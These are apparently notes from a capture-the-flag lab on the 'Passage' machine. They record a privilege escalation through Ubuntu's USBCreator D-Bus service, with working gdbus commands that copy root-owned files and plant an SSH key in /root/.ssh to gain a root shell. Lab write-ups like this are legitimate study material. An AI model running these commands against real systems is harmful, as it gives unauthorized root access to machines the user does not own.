6 privesc dbus com.ubuntu.USBCreator.conf

Using https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation

nadav@passage:/tmp$ cat /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
<!DOCTYPE busconfig PUBLIC
 "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
 "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
<busconfig>

  <!-- Only root can own the service -->
  <policy user="root">
    <allow own="com.ubuntu.USBCreator"/>
  </policy>

  <!-- Allow anyone to invoke methods (further constrained by
       PolicyKit privileges -->
  <policy context="default">
    <allow send_destination="com.ubuntu.USBCreator"
           send_interface="com.ubuntu.USBCreator"/>
    <allow send_destination="com.ubuntu.USBCreator"
           send_interface="org.freedesktop.DBus.Introspectable"/>
    <allow send_destination="com.ubuntu.USBCreator"
           send_interface="org.freedesktop.DBus.Properties"/>
  </policy>

</busconfig>
https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation#python
# tried the python method; didn't work

Using https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/
# the final image shows we can use dbus com.ubuntu.USBCreator.Image method to copy privileged files without password
# gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image 'source-file' 'dest-file' true

nadav@passage:~/.ssh$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image '/root/root.txt' '/home/nadav/root.txt' true
()
# works

# putting nadav's authorized_keys in /root/.ssh
nadav@passage:~/.ssh$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image '/home/nadav/.ssh/authorized_keys' '/root/.ssh/authorized_keys' true
()

# we can ssh in as root using nadav's id_rsa

$ ssh -i nadav_id_rsa root@10.10.10.206                                                                                                                                                                                               130 ⨯
Last login: Mon Aug 31 15:14:22 2020 from 127.0.0.1
root@passage:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

References:

Last updated